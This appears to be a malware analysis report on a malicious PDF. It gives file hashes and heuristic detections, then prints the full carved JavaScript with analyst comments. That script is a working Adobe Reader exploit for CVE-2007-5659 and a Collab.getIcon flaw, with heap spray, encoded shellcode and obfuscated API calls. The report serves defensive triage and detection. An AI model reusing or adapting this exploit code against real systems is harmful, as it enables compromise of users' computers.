Malicious PDF — malware analysis report

Static analysis result for SHA-256 dfe2d131ce8f4e92…

MALICIOUS

PDF

28.6 KB · Created: 2009-06-26 16:25:57 +08:00 · Authoring application: Acrobat PDFMaker 7.0 for Word (via Acrobat Distiller 7.0 (Windows)) · First seen: 2012-07-12
MD5: 4cc650350950cd126ce3f3fb98e2e7d4 SHA-1: 0adf8e5940956b869b926f1cf4a84f906ccc288e SHA-256: dfe2d131ce8f4e922012d4225e3a26d79178df6e98aa2efa02d98d5e9015183b
210 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# — In PDF document text
    • http://ns.adobe.com/pdf/1.3/ — In PDF document text
    • http://ns.adobe.com/pdfx/1.3/ — In PDF document text
    • http://ns.adobe.com/xap/1.0/ — In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/ — In PDF document text
    • http://purl.org/dc/elements/1.1/ — In PDF document text
    • http://ns.adobe.com/photoshop/1.0/ — In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0011_000.js | pdf-javascript-stream | PDF /JS object 11 at offset 0x424 | 5069 bytes
SHA-256: 0beeec19d831a6c6b403495c63ea3075332d25beaf994b9461834bdbd17e00b5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 22 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Dead code: evaluates a+b and discards the result (no return statement).
// Nothing in this preview calls none(); it carries no analytic weight on its own.
function none(a,b)
{
a+b;
}
// Returns `what` concatenated `count` times ("" when count <= 0).
// This is the string-building helper behind every large padding/spray buffer
// below (see exploit() and start()); its presence is one of the
// string-building tokens the triage counted for this artifact.
function repeat(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
// Hex decoder: consumes `buf` two hex digits at a time and maps each byte to a
// character through util.byteToChar — an Acrobat JavaScript API object, not
// standard JS, so this only runs inside Adobe Reader/Acrobat. An odd-length
// input would leave the final substr(x,2) with a single digit. Called once,
// from exploit(), with "0a0a0a0a".
function myunescape(buf) {
          var ret='';
          for (var x=0;x < buf.length; x+=2) {
          ret += util.byteToChar(Number('0x'+buf.substr(x,2)));
          }
          return ret;
}
// sc1 and sc2 are %u-escaped UTF-16 code-unit strings decoded with unescape()
// and concatenated into `sc`. sc1 is a short sequence containing non-printable
// values (e.g. %uEB90, %uCD02); sc2 is a long run whose code units fall almost
// entirely in the printable range 0x64-0x73, which is consistent with an encoded
// payload that is presumably transformed at runtime — treat both as opaque data
// and never execute them. `sc` is embedded in the spray/padding buffers built in
// exploit() and start().
var sc1 = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+
"%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+
"%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF");
var sc2 = unescape("%u6C72%u6464%u6464%u6464%u6464%u6E69%u6969%u6F6C"+
"%u7072%u656C%u7072%u686A%u6864%u6464%u6464%u6F6C"+
"%u6873%u6C72%u706C%u6564%u6464%u6464%u6F6C%u6C73"+
"%u6C72%u7372%u6464%u6464%u6464%u6D6C%u6A64%u7373"+
"%u6A67%u6C6A%u716E%u6F6D%u716B%u7371%u6C72%u6865"+
"%u6564%u6464%u6464%u6D6C%u6A68%u7064%u7373%u6A67"+
"%u6C6A%u6D66%u6665%u6A70%u6A69%u6C72%u6964%u6564"+
"%u6464%u6464%u6D6C%u6A68%u6465%u7373%u6A67%u6C6A"+
"%u6D69%u7067%u6B64%u6F6B%u6C72%u6A73%u6464%u6464"+
"%u6464%u6D6C%u6A68%u6865%u7373%u6A67%u6C6A%u726B"+
"%u6C71%u6672%u676B%u6C72%u6B72%u6464%u6464%u6464"+
"%u6D6C%u6A68%u6867%u6767%u6D70%u6F72%u6764%u6F6C"+
"%u7268%u7067%u676C%u6570%u6864%u6569%u6E6A%u6464"+
"%u6569%u7373%u6A69%u7064%u6D69%u676C%u6C73%u7373"+
"%u686B%u6473%u7167%u6468%u7365%u6464%u6464%u6A6B"+
"%u6D72%u6D6C%u7268%u7067%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6664%u6E6A%u6464%u7373%u6A6B"+
"%u7067%u7373%u6A69%u6465%u6D6C%u6A68%u6868%u676C"+
"%u6C73%u6464%u686B%u6F70%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6864%u7373%u6A6B%u6868%u7373"+
"%u6A69%u6865%u6D6C%u6A68%u6C68%u676C%u6C73%u6464"+
"%u686B%u696F%u656C%u6C67%u6966%u6469%u6868%u6A68"+
"%u6F6C%u7268%u7067%u696B%u716E%u656C%u6C6F%u6464"+
"%u6665%u6464%u6464%u6469%u686A%u6469%u6868%u696B"+
"%u656E%u656C%u6C6F%u6864%u6665%u6464%u6464%u7372"+
"%u7273%u6E72%u726E%u696B%u696D%u6D6F%u6464%u6A64"+
"%u6464%u6464%u656C%u7072%u6464%u6C64%u6464%u6464"+
"%u6A69%u6B69%u6F6C%u6473%u656C%u6A70%u6465%u6665"+
"%u6464%u6464%u6F6C%u6870%u676C%u6470%u6C64%u6F6C"+
"%u6C73%u6773%u686E%u6D6F%u6464%u6A64%u6464%u6464"+
"%u6D68%u6D68%u6D68%u6D68%u656C%u6867%u6C64%u7272"+
"%u7273%u7273%u7372%u696C%u6D70%u696B%u6573%u7369"+
"%u7269%u7373%u6A6B%u7067%u7373%u6A6B%u6C68%u7373"+
"%u6A6B%u6868%u7373%u6472%u6969%u6A69%u686A%u656E"+
"%u6467%u6464%u6464%u6464%u696C%u6470%u6C6B%u6765"+
"%u7267%u6F6C%u6468%u7064%u7267%u6F6C%u646B%u7065"+
"%u7267%u6F6C%u7269%u6C64%u716E%u7267%u6F6C%u6C6A"+
"%u6C64%u6F72%u7164%u7267%u6F6C%u6468%u6867%u7267"+
"%u6F6C%u6C6E%u6C6F%u6464%u6464%u6464%u6767%u6F71"+
"%u6F6C%u6970%u7269%u7169%u6670%u6864%u6464%u6769"+
"%u6969%u6A69%u6B69%u6A67%u6F6C%u706A%u6866%u6C65"+
"%u6A67%u6F6C%u6968%u7067%u6A67%u6F6C%u6869%u6964"+
"%u6C6B%u6764%u6971%u7267%u6F6C%u6E68%u6C65%u7267"+
"%u6F6C%u6E69%u6466%u6764%u7171%u6772%u6C67%u6D68"+
"%u7267%u6F6C%u6867%u6F6C%u6764%u6973%u6767%u7373"+
"%u7073%u6767%u6470%u706E%u6E67%u6870%u686B%u6B64"+
"%u6570%u7370%u7164%u6764%u6C73%u6F72%u6673%u6A67"+
"%u6F67%u706B%u6866%u6865%u696B%u7371%u7267%u6F6C"+
"%u6E69%u6866%u6764%u7171%u6A6A%u7267%u6F6C%u7064"+
"%u6F68%u7267%u6F6C%u6E69%u7065%u6764%u7171%u7267"+
"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+
"%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+
"%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+
"%u676C%u6470%u6964%u6770%u3030");
// Combined payload buffer referenced by both stages.
var sc = sc1+sc2;
// Stage selected for app.viewerVersion >= 8.0 (see the dispatch at the bottom of
// the script). Every variable here is assigned without var/let, so blah, bigblock,
// headersize, wap, fillblock, block, mm, i and of all become implicit globals.
function exploit() {

// Padding: 128 repeats of a 10-code-unit filler, then the encoded payload `sc`.
blah = repeat(128, unescape("%u4647%u4a4b%u4849%u4647%u4849")) + sc;
bigblock = unescape("%u4a4b%u4647");
headersize = 20;
wap = headersize+blah.length;
// Double bigblock until it is at least wap code units long.
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
// Grow block until block.length + wap reaches 0x40000 (262,144 code units).
while(block.length+wap<0x40000) block = block+block+fillblock;
// 200 copies of block+blah are kept alive in mm: a heap-spray pattern, the
// "heap-sprayed" staging the report's CVE-2007-5659 note describes.
mm = new Array();
for (i=0;i<200;i++) mm[i] = block + blah;
// 4096 repeats of the 4-byte decode of "0a0a0a0a" — presumably 16,384 line-feed
// characters, assuming util.byteToChar maps 0x0a to "\n" (Acrobat API; confirm).
of = repeat(4096, myunescape("0a0a0a0a"));
// The API name is assembled from hex-escaped literals: a[0] decodes to "_N.bundle"
// and a[1] to "getIcon", so this is Collab.getIcon(of + "_N.bundle"). A plain-text
// search of the stream for "getIcon" would not match. Note that the report's
// heuristics give an exact-CVE match only for collectEmailInfo (the start() path);
// this second Collab API call is not separately scored.
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65","\x67\x65\x74\x49\x63\x6f\x6e"];var b=[a[0x0]];Collab[a[0x1]](of+b[0x0]);
}

// Stage selected for app.viewerVersion < 8.0 (see the dispatch at the bottom of
// the script). Builds one of two version-specific `msg` buffers, both embedding
// the encoded payload `sc`, then passes it to Collab.collectEmailInfo — the call
// the report's first heuristic flags as CVE-2007-5659. plin and ef6 are assigned
// without var and so become implicit globals.
function start() 
{
if (app.viewerVersion >= 7.0)
{
// Layout for 7.x viewers: 1124 + 1 + 1 + 122 filler units, `sc`, then 1256 trailing units.
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc  + repeat(1256,unescape("%u4a4b%u4748"));
} 
else 
{
// Layout for viewers below 7.0: `sc` between two 80-unit fillers plus a fixed tail.
ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc  + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
// Left-pad until the length is a multiple of 8, then append 2626 copies of ef6.
while ((plin.length % 8) != 0) 
plin = unescape("%u4141") + plin;

plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
// a[0] decodes from hex escapes to "collectEmailInfo"; b is empty, so subj is
// undefined and msg carries the buffer built above. Nothing happens below 6.0.
var a=["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"];var b=[];Collab[a[0x0]]({subj:b[0x0],msg:plin});
}
}


// Entry point: picks a stage by app.viewerVersion. Both branches hand a string
// to app.setTimeOut, which evaluates it as code after 1200 ms — one of the
// string-to-code tokens the triage counted, and a reason an emulator has to run
// the script long enough for the timer to fire before the Collab call appears.
if(app.viewerVersion >= 8.0)
{
// this.external is an Acrobat document property; the author's name for it
// suggests the "viewer embedded in a browser" case — confirm against the API.
var inBrowser = this.external;
if (inBrowser)
          var shaft = app.setTimeOut("exploit()",1200);
else
          exploit();
}
else{
// Older viewers go straight to the collectEmailInfo path after the same delay.
var shaft = app.setTimeOut("start()",1200);
}